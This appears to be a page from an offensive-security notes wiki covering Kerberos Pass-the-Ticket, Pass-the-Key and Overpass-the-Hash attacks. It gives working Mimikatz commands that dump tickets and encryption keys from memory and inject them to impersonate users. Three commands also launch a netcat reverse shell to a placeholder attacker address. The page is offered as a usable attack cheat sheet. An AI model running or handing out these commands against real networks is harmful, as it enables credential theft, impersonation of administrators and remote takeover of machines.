Kerberos

Pass-the-Ticket (PtT)

This attack uses stolen Kerberos tickets (TGTs or service tickets) to authenticate to services without needing the user's password or hash.

Extracting Kerberos Tickets
- Use Mimikatz to export Kerberos tickets from memory:
  mimikatz # privilege::debug mimikatz # sekurlsa::tickets /export
Using Extracted Tickets
- Load and use a specific Kerberos ticket for authentication:
  mimikatz # kerberos::ptt [TICKET_FILE_NAME].kirbi

Pass-the-Key (PtK)

This attack uses extracted session keys (RC4, AES128, or AES256) instead of passwords to authenticate as a user. It’s a more versatile extension of the Pass-the-Hash (PtH) attack.

Extracting Session Keys
- Retrieve encryption keys (RC4, AES128, AES256) from memory:
  mimikatz # privilege::debug mimikatz # sekurlsa::ekeys

Using Extracted Keys

Launch processes using extracted session keys for authentication.

If RC4 Key (Equivalent to NTLM Hash):

mimikatz # sekurlsa::pth /user:Administrator /domain:DOMAIN /rc4:RC4_KEY /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"

If AES128 Key:

mimikatz # sekurlsa::pth /user:Administrator /domain:DOMAIN /aes128:AES128_KEY /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"

If AES256 Key:

mimikatz # sekurlsa::pth /user:Administrator /domain:DOMAIN /aes256:AES256_KEY /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP PORT"

Overpass-the-Hash (OPtH)

Concept:
- RC4 keys are equivalent to the NTLM hash of a user.
- If the NTLM hash is available, it can be used to request a Ticket Granting Ticket (TGT), provided RC4 is an enabled encryption protocol.
Key Details:
- NTLM hash = RC4 key.
- Used to perform Kerberos authentication without needing the original password.

PreviousLateralization NextPassing the Hash (PtH)

Last updated 1 year ago

hashtagPass-the-Ticket (PtT)

hashtagPass-the-Key (PtK)

hashtagOverpass-the-Hash (OPtH)

Pass-the-Ticket (PtT)

Pass-the-Key (PtK)

Overpass-the-Hash (OPtH)